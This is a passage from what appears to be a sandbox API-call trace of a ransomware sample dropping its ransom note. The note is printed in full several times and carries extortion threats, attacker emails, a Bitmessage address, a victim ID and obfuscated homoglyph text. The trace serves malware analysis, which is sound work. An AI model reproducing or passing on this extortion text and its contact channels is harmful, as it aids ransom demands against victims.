size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x72efb8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nð¦1\x97ÇrÛQ\x82\x18^\x82ÏÇ\x11\nÓ­Ã-\x99\x9bè\x13W\x03", lpUsedDefaultChar=0x0) returned 8717 [0220.529] WriteFile (in: hFile=0x2d0, lpBuffer=0x72efb8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x72efb8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0220.530] CloseHandle (hObject=0x2d0) returned 1 [0220.530] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\#readme_eman#.rtf")) returned 0xffffffff [0220.530] GetLastError () returned 0x2 [0220.530] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0220.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r 